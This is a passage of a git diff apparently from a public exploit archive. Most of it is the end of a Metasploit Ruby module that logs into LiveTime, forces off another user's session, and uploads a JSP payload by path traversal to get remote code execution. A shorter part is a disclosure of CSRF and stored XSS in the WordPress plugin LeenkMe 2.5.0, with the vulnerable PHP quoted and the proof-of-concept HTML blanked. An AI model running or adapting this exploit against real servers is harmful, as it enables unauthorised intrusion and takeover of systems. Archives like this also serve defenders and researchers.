} + }) + + if res && res.code == 200 && + (res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above + res.body.to_s =~ /\

/) # v6.5 + import_url = $1 + else + # hmm either the password is wrong or someone else is using "our" account.. . + # let's try to boot him out + if res && res.code == 200 && res.body.to_s =~ /class\=\"login\-form\"(.*)action\=\"([\w\/\.]+)(\;jsessionid\=)*/ && + res.body.to_s =~ /This account is in use on another system/ + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(login_url), + 'headers' => { + 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', + }, + 'cookie' => @cookies, + 'vars_post' => { + username_form => datastore['USERNAME'], + password_form => datastore['PASSWORD'], + 'ButtonLoginOverride' => 'Login' + } + }) + if res && res.code == 200 && + (res.body.to_s =~ /id\=\"clientListForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above + res.body.to_s =~ /\/) # v6.5 + import_url = $1 + else + fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.") + end + else + fail_with(Failure::Unknown, "#{peer} - Failed to get the import URL.") + end + end + + # 3: get the upload_url + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(import_url), + 'headers' => { + 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', + }, + 'cookie' => @cookies, + 'vars_post' => { + 'ButtonImport' => 'Import' + } + }) + + if res && res.code == 200 && + (res.body.to_s =~ /id\=\"clientImportUploadForm\" action\=\"([\w\/\.]+)\"\>/ || # v7 and above + res.body.to_s =~ /\/) # v6.5 + @upload_url = $1 + else + fail_with(Failure::Unknown, "#{peer} - Failed to get the upload URL.") + end + + if res.body.to_s =~ /\/ + @upload_form = $1 + else + # go with the default for 7.1.0, might not work with other versions... + @upload_form = "0.53.19.0.2.7.0.3.0.0.1.1.1.4.0.0.23" + end + + # 4: target selection + @my_target = nil + # pick_target returns the traversal_path and sets @my_target + traversal_path = pick_target + if @my_target.nil? + fail_with(Failure::NoTarget, "#{peer} - Unable to select a target, we must bail.") + else + print_status("#{peer} - Selected target #{@my_target.name} with traversal path #{traversal_path}") + end + + # When using auto targeting, MSF selects the Windows meterpreter as the default payload. + # Fail if this is the case and ask the user to select an appropriate payload. + if @my_target['Platform'] == 'linux' && payload_instance.name =~ /Windows/ + fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.") + end + + # 5: generate the JSP with the payload + jsp = create_jsp + print_status("#{peer} - Uploading payload...") + jsp_name = upload_jsp(traversal_path, jsp) + if traversal_path.include? '/srv/tomcat6/webapps/' + register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name) + else + register_files_for_cleanup('../webapps/LiveTime/' + jsp_name) + end + + # 6: pwn it! + print_status("#{peer} - Requesting #{jsp_name}") + send_request_raw({'uri' => normalize_uri('LiveTime', jsp_name)}) + + handler + end +end \ No newline at end of file diff --git a/platforms/php/webapps/39704.txt b/platforms/php/webapps/39704.txt new file mode 100755 index 000000000..4734c5b31 --- /dev/null +++ b/platforms/php/webapps/39704.txt @@ -0,0 +1,117 @@ +I would like to disclose CSRF and stored XSS vulnerability in Wordpress +plugin LeenkMe version 2.5.0. + +The plugin can be found at https://wordpress.org/plugins/leenkme/ + +In the page wp-content/plugins/leenkme/facebook.php + +XSS vulnerable Fields are : + + - facebook_message + - facebook_linkname + - facebook_caption + - facebook_description + - default_image + - _wp_http_referer + + +This CSRF is tested on latest wordpress installation 4.4.2 using firefox +browser. + +The Code for CSRF.html is + + + + + + + + + + + + + + + + + +
+ + + + +The vulnerable page is + +wp-content/plugins/leenkme/facebook.php + +The vulnerable code producing XSS is + + +if ( !empty( $_REQUEST['facebook_message'] ) ) +$user_settings['facebook_message'] = $_REQUEST['facebook_message']; +else +$user_settings['facebook_message'] = ''; +if ( !empty( $_REQUEST['facebook_linkname'] ) ) +$user_settings['facebook_linkname'] = $_REQUEST['facebook_linkname']; +else +$user_settings['facebook_linkname'] = ''; +if ( !empty( $_REQUEST['facebook_caption'] ) ) +$user_settings['facebook_caption'] = $_REQUEST['facebook_caption']; +else +$user_settings['facebook_caption'] = ''; +if ( !empty( $_REQUEST['facebook_description'] ) ) +$user_settings['facebook_description'] = $_REQUEST['facebook_description']; + + +------------------------- +------------------------- +------------------------- +snip +------------------------ +------------------------- +-------------------------- + +